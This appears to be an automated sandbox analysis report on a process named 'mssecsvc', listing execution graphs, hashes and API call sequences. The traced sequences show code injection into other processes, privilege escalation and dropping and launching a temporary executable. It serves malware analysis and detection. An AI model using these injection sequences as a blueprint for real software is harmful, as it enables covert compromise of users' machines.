• String ID: .DLL
• API String ID: 1646373207-899428287
• Opcode ID: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
• Instruction ID: 2f73ade5318114d7e9bf37e66f68aeb85e6b2a503a621854e5f62f64a3af89c8
• Opcode Fuzzy Hash: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
• Instruction Fuzzy Hash: D701D634607104EACB538E38C845BFE3B7EFF14275F004115D91A8F159C77A9A508F95
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(01FBF7C4), ref: 00B9113D
• GetProcAddress.KERNEL32(00000000,00B911D6), ref: 00B91148
Strings
Memory Dump Source
• Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: .DLL
• API String ID: 1646373207-899428287
• Opcode ID: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
• Instruction ID: 84791d5e26c0aa329e13559ef3f55e38cf348d4f8042eee9febf51cf543a8531
• Opcode Fuzzy Hash: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
• Instruction Fuzzy Hash: 0E01DB30607012FACF649E2CC8496A93BECFF05341F0049B4EA1A9B155C7708E40A695
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 4.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 330
Total number of Limit Nodes: 1
execution_graph 2537 a83888 2539 a8388e GetSystemTime 2537->2539 2542 a838d2 2539->2542 2540 a8390c Sleep 2540->2542 2541 a83a32 2542->2540 2542->2541 2543 a839b9 Sleep 2542->2543 2543->2542 2489 a8662d 2492 a86647 2489->2492 2493 a86637 2492->2493 2494 a86652 2492->2494 2496 a86658 2494->2496 2499 a82574 2496->2499 2518 a8252f NtOpenSection 2499->2518 2501 a8257c 2502 a82661 2501->2502 2503 a82582 NtMapViewOfSection FindCloseChangeNotification 2501->2503 2502->2493 2503->2502 2506 a825ba 2503->2506 2504 a825ef 2520 a82477 NtProtectVirtualMemory NtWriteVirtualMemory 2504->2520 2506->2504 2519 a82477 NtProtectVirtualMemory NtWriteVirtualMemory 2506->2519 2507 a82600 2521 a82477 NtProtectVirtualMemory NtWriteVirtualMemory 2507->2521 2510 a82611 2522 a82477 NtProtectVirtualMemory NtWriteVirtualMemory 2510->2522 2512 a82622 2513 a82637 2512->2513 2523 a82477 NtProtectVirtualMemory NtWriteVirtualMemory 2512->2523 2515 a8264c 2513->2515 2524 a82477 NtProtectVirtualMemory NtWriteVirtualMemory 2513->2524 2515->2502 2525 a82477 NtProtectVirtualMemory NtWriteVirtualMemory 2515->2525 2518->2501 2519->2504 2520->2507 2521->2510 2522->2512 2523->2513 2524->2515 2525->2502 2562 a8116f LoadLibraryA 2565 a81196 GetProcAddress 2562->2565 2564 a81180 2565->2564 3032 a80fcf 3033 a810a0 3032->3033 3034 a8115c 3033->3034 3035 a81133 GetModuleHandleA GetProcAddress 3033->3035 3035->3033 2526 a86620 2527 a86647 5 API calls 2526->2527 2528 a8662a 2527->2528 2544 a80000 2545 a80004 2544->2545 2546 a800a1 2545->2546 2548 a8025e 2545->2548 2552 a80105 2548->2552 2551 a80278 2551->2546 2553 a80116 GetPEB 2552->2553 2553->2551 2566 a833e0 2567 a8344e 2566->2567 2568 a833e5 2566->2568 2569 a8345f NtQuerySystemInformation 2567->2569 2574 a835f3 2567->2574 2570 a8346f MapViewOfFile CloseHandle 2568->2570 2572 a83440 NtOpenSection 2568->2572 2569->2570 2573 a834b0 2570->2573 2570->2574 2571 a834b7 UnmapViewOfFile 2571->2574 2572->2567 2573->2571 2573->2574 2529 a81422 LookupPrivilegeValueA NtAdjustPrivilegesToken 2575 a82762 2577 a82768 2575->2577 2578 a82829 2577->2578 2579 a82780 GetTempPathA 2577->2579 2585 a827a7 GetTempFileNameA CreateFileA 2579->2585 2582 a827ce 2583 a827fe CloseHandle CreateProcessA 2582->2583 2584 a827ea WriteFile 2582->2584 2583->2578 2584->2582 2584->2583 2586 a827a3 CreateFileA 2585->2586 2587 a827ce 2585->2587 2586->2578 2586->2582 2588 a827fe CloseHandle CreateProcessA 2587->2588 2589 a827ea WriteFile 2587->2589 2588->2586 2589->2587 2589->2588 2590 a82665 2592 a8266b CreateThread CloseHandle 2590->2592 2593 a83c38 2592->2593 2595 a83c3d 2593->2595 2596 a83ca9 2595->2596 2599 a83c5b GetWindowsDirectoryA 2595->2599 2646 a8252f NtOpenSection 2596->2646 2598 a83cae 2601 a83cfb GetSystemDirectoryA 2598->2601 2602 a83cb5 2598->2602 2603 a83d26 2599->2603 2687 a83d1f lstrcat 2601->2687 2647 a83cc2 GetModuleHandleA 2602->2647 2725 a83d36 LoadLibraryA 2603->2725 2646->2598 2648 a83ccc 2647->2648 2649 a83cde 2647->2649 2651 a83cd4 GetProcAddress 2648->2651 2762 a83cf0 GetModuleHandleA 2649->2762 2651->2649 2688 a83d26 2687->2688 2689 a83d36 127 API calls 2688->2689 2690 a83d2b GetProcAddress LoadLibraryA 2689->2690 2692 a810ce 2 API calls 2690->2692 2693 a83d7d 2692->2693 2694 a83d92 GetTickCount 2693->2694 2695 a83daa 2694->2695 2696 a83e47 GetVolumeInformationA 2695->2696 2697 a83e7a 2696->2697 2698 a83f25 2697->2698 2699 a83eb5 84 API calls 2697->2699 2701 a83f4f 2698->2701 2702 a83f31 CreateThread CloseHandle 2698->2702 2700 a83ea9 2699->2700 2700->2698 2704 a83efd 2700->2704 2706 a83eca GetModuleFileNameA 2700->2706 2703 a83f60 43 API calls 2701->2703 2702->2701 2705 a83f54 2703->2705 2704->2698 2708 a83405 5 API calls 2704->2708 2707 a810ce 2 API calls 2705->2707 2706->2704 2709 a83f7e 2707->2709 2708->2698 2710 a83f8f 28 API calls 2709->2710 2711 a83f83 2710->2711 2712 a83ffa CreateEventA 2711->2712 2713 a83fd3 CreateThread CloseHandle 2711->2713 2720 a84012 2712->2720 2713->2712 2714 a84056 lstrlen 2714->2714 2714->2720 2715 a84320 RtlExitUserThread 2716 a842d0 SetEvent 2716->2720 2717 a842f2 Sleep ResetEvent 2717->2720 2718 a840ef GetVersionExA 2718->2720 2719 a84178 11 API calls 2719->2720 2720->2714 2720->2715 2720->2716 2720->2717 2720->2718 2720->2719 2721 a841a7 CreateThread CloseHandle 2720->2721 2722 a841f6 GetTickCount 2720->2722 2723 a84288 Sleep 2720->2723 2721->2720 2722->2720 2723->2720 2724 a84294 GetTickCount 2723->2724 2724->2720 2915 a83d4b GetProcAddress LoadLibraryA 2725->2915 2801 a826d4 2762->2801 2765 a83d1f 149 API calls 2766 a83d12 GetProcAddress LoadLibraryA 2765->2766 2803 a810ce 2766->2803 2769 a83d7d 2770 a83d92 GetTickCount 2769->2770 2771 a83daa 2770->2771 2772 a83e47 GetVolumeInformationA 2771->2772 2773 a83e7a 2772->2773 2774 a83f25 2773->2774 2807 a83eb5 LoadLibraryA 2773->2807 2777 a83f4f 2774->2777 2778 a83f31 CreateThread CloseHandle 2774->2778 2835 a83f60 LoadLibraryA 2777->2835 2778->2777 2802 a826c8 GetSystemDirectoryA 2801->2802 2802->2765 2805 a810db 2803->2805 2804 a8115c 2804->2769 2805->2803 2805->2804 2806 a81133 GetModuleHandleA GetProcAddress 2805->2806 2806->2805 2853 a83ecc GetProcAddress GetModuleFileNameA 2807->2853 2836 a83f7e 2835->2836 2837 a810ce 2 API calls 2835->2837 2838 a83f8f 28 API calls 2836->2838 2837->2836 2839 a83f83 2838->2839 2840 a83ffa CreateEventA 2839->2840 2841 a83fd3 CreateThread CloseHandle 2839->2841 2848 a84012 2840->2848 2841->2840 2842 a84056 lstrlen 2842->2842 2842->2848 2843 a84320 RtlExitUserThread 2844 a842d0 SetEvent 2844->2848 2845 a842f2 Sleep ResetEvent 2845->2848 2846 a840ef GetVersionExA 2846->2848 2847 a84178 11 API calls 2847->2848 2848->2842 2848->2843 2848->2844 2848->2845 2848->2846 2848->2847 2849 a841a7 CreateThread CloseHandle 2848->2849 2850 a841f6 GetTickCount 2848->2850 2851 a84288 Sleep 2848->2851 2849->2848 2850->2848 2851->2848 2852 a84294 GetTickCount 2851->2852 2852->2848 2854 a83efd 2853->2854 2855 a83f25 2854->2855 2878 a83405 2854->2878 2857 a83f4f 2855->2857 2858 a83f31 CreateThread CloseHandle 2855->2858 2859 a83f60 43 API calls 2857->2859 2858->2857 2860 a83f54 2859->2860 2861 a810ce 2 API calls 2860->2861 2862 a83f7e 2861->2862 2887 a83f8f LoadLibraryA 2862->2887 2879 a8343b 2878->2879 2879->2879 2880 a83440 NtOpenSection 2879->2880 2881 a8344e 2880->2881 2882 a8345f NtQuerySystemInformation 2881->2882 2886 a835f3 2881->2886 2883 a8346f MapViewOfFile CloseHandle 2882->2883 2885 a834b0 2883->2885 2883->2886 2884 a834b7 UnmapViewOfFile 2884->2886 2885->2884 2885->2886 2886->2855 2888 a83f9d 2887->2888 2889 a84320 RtlExitUserThread 2887->2889 2890 a810ce 2 API calls 2888->2890 2891 a83fb5 2890->2891 2891->2889 2892 a83fd4 CreateThread CloseHandle 2891->2892 2893 a83ffa CreateEventA 2892->2893 2899 a84012 2893->2899 2894 a84056 lstrlen 2894->2894 2894->2899 2895 a842d0 SetEvent 2895->2899 2896 a842f2 Sleep ResetEvent 2896->2899 2897 a840ef GetVersionExA 2897->2899 2899->2889 2899->2894 2899->2895 2899->2896 2899->2897 2900 a841a7 CreateThread CloseHandle 2899->2900 2901 a841f6 GetTickCount 2899->2901 2902 a84288 Sleep 2899->2902 2904 a84178 2899->2904 2900->2899 2901->2899 2902->2899 2903 a84294 GetTickCount 2902->2903 2903->2899 2914 a84012 2904->2914 2905 a841a7 CreateThread CloseHandle 2905->2914 2906 a841f6 GetTickCount 2906->2914 2907 a84320 RtlExitUserThread 2908 a842d0 SetEvent 2908->2914 2909 a842f2 Sleep ResetEvent 2909->2914 2910 a84056 lstrlen 2910->2910 2910->2914 2911 a84288 Sleep 2912 a84294 GetTickCount 2911->2912 2911->2914 2912->2914 2913 a840ef GetVersionExA 2913->2914 2914->2905 2914->2906 2914->2907 2914->2908 2914->2909 2914->2910 2914->2911 2914->2913 2916 a83d7d 2915->2916 2917 a810ce 2 API calls 2915->2917 2918 a83d92 GetTickCount 2916->2918 2917->2916 2919 a83daa 2918->2919 2920 a83e47 GetVolumeInformationA 2919->2920 2921 a83e7a 2920->2921 2922 a83f25 2921->2922 2923 a83eb5 84 API calls 2921->2923 2925 a83f4f 2922->2925 2926 a83f31 
CreateThread CloseHandle 2922->2926 2924 a83ea9 2923->2924 2924->2922 2928 a83efd 2924->2928 2930 a83eca GetModuleFileNameA 2924->2930 2927 a83f60 43 API calls 2925->2927 2926->2925 2929 a83f54 2927->2929 2928->2922 2932 a83405 5 API calls 2928->2932 2931 a810ce 2 API calls 2929->2931 2930->2928 2933 a83f7e 2931->2933 2932->2922 2934 a83f8f 28 API calls 2933->2934 2935 a83f83 2934->2935 2936 a83ffa CreateEventA 2935->2936 2937 a83fd3 CreateThread CloseHandle 2935->2937 2944 a84012 2936->2944 2937->2936 2938 a84056 lstrlen 2938->2938 2938->2944 2939 a84320 RtlExitUserThread 2940 a842d0 SetEvent 2940->2944 2941 a842f2 Sleep ResetEvent 2941->2944 2942 a840ef GetVersionExA 2942->2944 2943 a84178 11 API calls 2943->2944 2944->2938 2944->2939 2944->2940 2944->2941 2944->2942 2944->2943 2945 a841a7 CreateThread CloseHandle 2944->2945 2946 a841f6 GetTickCount 2944->2946 2947 a84288 Sleep 2944->2947 2945->2944 2946->2944 2947->2944 2948 a84294 GetTickCount 2947->2948 2948->2944 2554 a83399 2556 a833a2 2554->2556 2557 a833a9 Sleep 2556->2557 2557->2557 2558 a83819 2560 a8381f WaitForSingleObject 2558->2560 2561 a8383b 2560->2561 2533 a8443b 2536 a8144a LookupPrivilegeValueA NtAdjustPrivilegesToken 2533->2536 2535 a84441 2536->2535 2481 409a16 __set_app_type __p__fmode __p__commode 2482 409a85 2481->2482 2483 409a99 2482->2483 2484 409a8d __setusermatherr 2482->2484 2488 409b8c _controlfp 2483->2488 2484->2483 2486 409a9e _initterm __getmainargs _initterm 2487 409af2 2486->2487 2488->2486 2949 a802fe 2950 a80415 2949->2950 2952 a8042d 2950->2952 2953 a810ce 2 API calls 2952->2953 2954 a8048f 2953->2954 2955 a804dd 2954->2955 2956 a804b0 GetModuleHandleA 2954->2956 2957 a804f8 GetVersion 2955->2957 2956->2955 2958 a805ca 2957->2958 2959 a8050f VirtualAlloc 2957->2959 2960 a805a9 CloseHandle 2958->2960 2961 a805d3 SetProcessAffinityMask 2958->2961 2959->2960 2965 a80532 2959->2965 2963 a805f2 GetModuleHandleA 2960->2963 2986 a805f2 GetModuleHandleA 2961->2986 2964 a810ce 2 API 
calls 2963->2964 2981 a805ec 2964->2981 2965->2960 2983 a805ba 2965->2983 2966 a806fc lstrcpyW 3005 a824ae lstrcpyW lstrlenW 2966->3005 2968 a8074c NtMapViewOfSection 2968->2960 2968->2981 2969 a80717 GetPEB lstrcpyW lstrcatW 2971 a824ae 3 API calls 2969->2971 2971->2981 2972 a80780 NtOpenProcessToken 2973 a807c5 CreateToolhelp32Snapshot Process32First 2972->2973 2972->2981 2974 a807eb Process32Next 2973->2974 2975 a80865 CloseHandle 2974->2975 2974->2981 2975->2960 2976 a807fd OpenProcess 2976->2974 2976->2981 2978 a82574 5 API calls 2978->2981 2979 a8085c CloseHandle 2979->2974 2980 a80834 CreateRemoteThread 2980->2979 2980->2981 2981->2960 2981->2966 2981->2968 2981->2969 2981->2972 2981->2973 2981->2974 2981->2976 2981->2978 2981->2979 2981->2980 2982 a805ba Sleep 2981->2982 3008 a807ac 2981->3008 2982->2979 2984 a805c9 2983->2984 2985 a805bf Sleep 2983->2985 2984->2960 2985->2983 2987 a810ce 2 API calls 2986->2987 2988 a8060e 2987->2988 2989 a805a9 CloseHandle 2988->2989 2990 a806fc lstrcpyW 2988->2990 2992 a8074c NtMapViewOfSection 2988->2992 2993 a80717 GetPEB lstrcpyW lstrcatW 2988->2993 2995 a80780 NtOpenProcessToken 2988->2995 2996 a807c5 CreateToolhelp32Snapshot Process32First 2988->2996 2997 a807eb Process32Next 2988->2997 2999 a807fd OpenProcess 2988->2999 3000 a807ac 30 API calls 2988->3000 3001 a82574 5 API calls 2988->3001 3002 a8085c CloseHandle 2988->3002 3003 a80834 CreateRemoteThread 2988->3003 3004 a805ba Sleep 2988->3004 2989->2986 2991 a824ae 3 API calls 2990->2991 2991->2988 2992->2988 2992->2989 2994 a824ae 3 API calls 2993->2994 2994->2988 2995->2988 2995->2996 2996->2997 2997->2988 2998 a80865 CloseHandle 2997->2998 2998->2989 2999->2988 2999->2997 3000->2988 3001->2988 3002->2997 3003->2988 3003->3002 3004->3002 3006 a86ce7 3005->3006 3007 a824ea NtCreateSection 3006->3007 3007->2981 3031 a8144a LookupPrivilegeValueA NtAdjustPrivilegesToken 3008->3031 3010 a807b2 FreeLibrary FindCloseChangeNotification 3011 a807c5 
CreateToolhelp32Snapshot Process32First 3010->3011 3012 a807eb Process32Next 3011->3012 3013 a80865 CloseHandle 3012->3013 3029 a8060e 3012->3029 3014 a805a9 CloseHandle 3013->3014 3016 a805f2 GetModuleHandleA 3014->3016 3015 a807fd OpenProcess 3015->3012 3015->3029 3017 a810ce 2 API calls 3016->3017 3017->3029 3018 a82574 5 API calls 3018->3029 3019 a8085c CloseHandle 3019->3012 3020 a80834 CreateRemoteThread 3020->3019 3021 a8084d 3020->3021 3022 a805ba Sleep 3021->3022 3022->3019 3023 a806fc lstrcpyW 3024 a824ae 3 API calls 3023->3024 3024->3029 3025 a8074c NtMapViewOfSection 3025->3014 3025->3029 3026 a80717 GetPEB lstrcpyW lstrcatW 3027 a824ae 3 API calls 3026->3027 3027->3029 3028 a80780 NtOpenProcessToken 3028->3011 3028->3029 3029->3011 3029->3012 3029->3014 3029->3015 3029->3018 3029->3019 3029->3020 3029->3023 3029->3025 3029->3026 3029->3028 3030 a807ac 13 API calls 3029->3030 3030->3029 3031->3010

                                                                                Control-flow Graph: entry block a8042d-a804a4, final block a80865-a80872 (graph rendering omitted)
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00A804BE
                                                                                • GetVersion.KERNEL32 ref: 00A80500
                                                                                • VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 00A80528
                                                                                • CloseHandle.KERNEL32(?), ref: 00A805AD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Handle$AllocCloseModuleVersionVirtual
                                                                                • String ID: \BaseNamedObjects\npbtVt$\BaseNamedObjects\npbtVt$csrs
                                                                                • API String ID: 3017432202-4282356854
                                                                                • Opcode ID: 81b0063a9adf2c12a5dd8ff3f23d6d1627d705fe34f51cbb45105d7fa12ae896
                                                                                • Instruction ID: 4eb1f2d3fd7875ab3c0331ba287f790178648f1a0f5ef42fb40255786449e7a7
                                                                                • Opcode Fuzzy Hash: 81b0063a9adf2c12a5dd8ff3f23d6d1627d705fe34f51cbb45105d7fa12ae896
                                                                                • Instruction Fuzzy Hash: A1B1BA71605249FFEB65AF24C80AFAA3BADEF44310F004128F9099E081C7F09F59CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph: entry block a805f2-a80615, final block a80865-a80872 (graph rendering omitted)
                                                                                APIs
                                                                                • CloseHandle.KERNEL32(?), ref: 00A805AD
                                                                                • GetModuleHandleA.KERNEL32(00A805EC), ref: 00A805F2
                                                                                • lstrcpyW.KERNEL32(\BaseNamedObjects\npbtVt,\BaseNamedObjects\npbtVt), ref: 00A8070A
                                                                                • lstrcpyW.KERNEL32(\BaseNamedObjects\npbtVt,?), ref: 00A8072D
                                                                                • lstrcatW.KERNEL32(\BaseNamedObjects\npbtVt,\npbtVt), ref: 00A8073B
                                                                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 00A8076B
                                                                                • NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 00A80786
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A807C9
                                                                                • Process32First.KERNEL32 ref: 00A807DC
                                                                                • Process32Next.KERNEL32 ref: 00A807ED
                                                                                • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00A80805
                                                                                • CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00A80842
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00A8085D
                                                                                • CloseHandle.KERNEL32 ref: 00A8086C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
                                                                                • String ID: \BaseNamedObjects\npbtVt$\BaseNamedObjects\npbtVt$csrs
                                                                                • API String ID: 1545766225-4282356854
                                                                                • Opcode ID: 84343efd2f347f88d62e26acca5ca8bb34f80725e1b7dabf79c0c1ff2d0fa36d
                                                                                • Instruction ID: 5282e08341f8ced445e45ba663cf85bf1af6a4bd17b347a1d2bab1f1512455a2
                                                                                • Opcode Fuzzy Hash: 84343efd2f347f88d62e26acca5ca8bb34f80725e1b7dabf79c0c1ff2d0fa36d
                                                                                • Instruction Fuzzy Hash: EF718A31605209FFEB65AF10CC4AFAE3B6DEF45311F104028E9099E091C7B59F499BA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph: single block a8252f-a82573 NtOpenSection
                                                                                APIs
                                                                                • NtOpenSection.NTDLL(?,0000000E), ref: 00A8255E
                                                                                Strings
                                                                                • \BaseNamedObjects\npbtVt, xrefs: 00A8254B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: OpenSection
                                                                                • String ID: \BaseNamedObjects\npbtVt
                                                                                • API String ID: 1950954290-3914055295
                                                                                • Opcode ID: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                                                                                • Instruction ID: cc492c20b74137972e1aeb42a549193fdcd5baff80c1f90c3202c4eb3a6ea2fd
                                                                                • Opcode Fuzzy Hash: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                                                                                • Instruction Fuzzy Hash: A1E0DFF1342105BAFB288B19CC07FB7220DCBC0600F048604F918DA090E6F4AF104278
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph: entry block a82574-a8257c, final block a82661-a82664 (graph rendering omitted)
                                                                                APIs
                                                                                  • Part of subcall function 00A8252F: NtOpenSection.NTDLL(?,0000000E), ref: 00A8255E
                                                                                • NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000B7C4,00000000,?,00000002,00100000,00000040), ref: 00A825A4
                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,0000B7C4,00000000,?,00000002,00100000,00000040,00000000,0000B7C4,00000000,?,00A80815), ref: 00A825AC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Section$ChangeCloseFindNotificationOpenView
                                                                                • String ID:
                                                                                • API String ID: 1694706092-0
                                                                                • Opcode ID: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                                                                                • Instruction ID: 0060fcdfbef91a0cc7bcfb9512bfa99a5eb6d19f4902e906be010f77603aea86
                                                                                • Opcode Fuzzy Hash: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                                                                                • Instruction Fuzzy Hash: B121E97030054ABBEB28EF65CC56FB97369EF80744F501128F8598E1D5EBB1AE14C768
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph: single block a81422-a81474 LookupPrivilegeValueA NtAdjustPrivilegesToken
                                                                                APIs
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00A8145A
                                                                                • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00A8146A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                • String ID:
                                                                                • API String ID: 3615134276-0
                                                                                • Opcode ID: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
                                                                                • Instruction ID: ddbff97e699881e74d61e2820170bd54818263a6fff0c1519b9bac5ac29647fb
                                                                                • Opcode Fuzzy Hash: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
                                                                                • Instruction Fuzzy Hash: 5BF0AE36542510BBD7205F56CD8EED77F28EF533A0F144556F4484E151C2624BA5D3F4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph: single block a82477-a824ad NtProtectVirtualMemory NtWriteVirtualMemory
                                                                                APIs
                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 00A8249B
                                                                                • NtWriteVirtualMemory.NTDLL ref: 00A824A4
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MemoryVirtual$ProtectWrite
                                                                                • String ID:
                                                                                • API String ID: 151266762-0
                                                                                • Opcode ID: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                                                                                • Instruction ID: 6bbb67ea70d6ee96dfa5f1d7b4d314b28acc786a60d934acbd3f762ecc45b662
                                                                                • Opcode Fuzzy Hash: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                                                                                • Instruction Fuzzy Hash: 2AE012E07502007FF5185F55DC5FF7B391DDB41751F410208FA0A981C4F9A15E18467A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph: single block a8144a-a81474 LookupPrivilegeValueA NtAdjustPrivilegesToken
                                                                                APIs
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00A8145A
                                                                                • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00A8146A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                • String ID:
                                                                                • API String ID: 3615134276-0
                                                                                • Opcode ID: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                                                                                • Instruction ID: ee32c209e3d0a2de55b6acbdbca8a3d00d8b73f2470e3acbbab87dcaf3c2c19a
                                                                                • Opcode Fuzzy Hash: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                                                                                • Instruction Fuzzy Hash: F2D06731643034BBD6312A568C0EEE77D1DEF577A0F015041F9089A1A1C5A28EA1C7F5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 128 a807ac-a807bf call a8144a FreeLibrary FindCloseChangeNotification 131 a807c5-a807e4 CreateToolhelp32Snapshot Process32First 128->131 132 a807eb-a807f5 Process32Next 131->132 133 a80865-a80872 CloseHandle 132->133 134 a807f7-a807fb 132->134 135 a805a9-a80615 CloseHandle GetModuleHandleA call a810ce 133->135 134->132 136 a807fd-a8080d OpenProcess 134->136 144 a80617-a80630 135->144 136->132 137 a8080f 136->137 139 a80810-a80818 call a82574 137->139 145 a8081a-a80820 139->145 146 a8085c-a80863 CloseHandle 139->146 148 a80639-a80652 144->148 149 a80632 144->149 145->146 147 a80822-a80832 145->147 146->132 147->146 150 a80834-a8084b CreateRemoteThread 147->150 148->135 151 a80658-a80671 148->151 149->148 150->146 152 a8084d-a80857 call a805ba 150->152 151->135 153 a80677-a80690 151->153 152->146 153->135 155 a80696-a8069c 153->155 156 a806d8-a806de 155->156 157 a8069e-a806b1 155->157 159 a806fc-a80715 lstrcpyW call a824ae 156->159 160 a806e0-a806f3 156->160 157->135 158 a806b7-a806bd 157->158 158->156 163 a806bf-a806d2 158->163 165 a8074c-a80775 NtMapViewOfSection 159->165 166 a80717-a80746 GetPEB lstrcpyW lstrcatW call a824ae 159->166 160->159 161 a806f5 160->161 161->159 163->135 163->156 165->135 168 a8077b-a8078f call a80305 NtOpenProcessToken 165->168 166->135 166->165 168->131 172 a80791-a807a3 call a8115d call a807ac 168->172 177 a8080e-a8080f 172->177 178 a807a5 172->178 177->139 178->139 179 a807a7-a807c4 178->179 179->131
                                                                                APIs
                                                                                  • Part of subcall function 00A8144A: LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00A8145A
                                                                                  • Part of subcall function 00A8144A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00A8146A
                                                                                • CloseHandle.KERNEL32(?), ref: 00A805AD
                                                                                • FreeLibrary.KERNEL32(73E60000,?,00A8079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00A807B8
                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,00A8079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00A807BF
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A807C9
                                                                                • Process32First.KERNEL32 ref: 00A807DC
                                                                                • Process32Next.KERNEL32 ref: 00A807ED
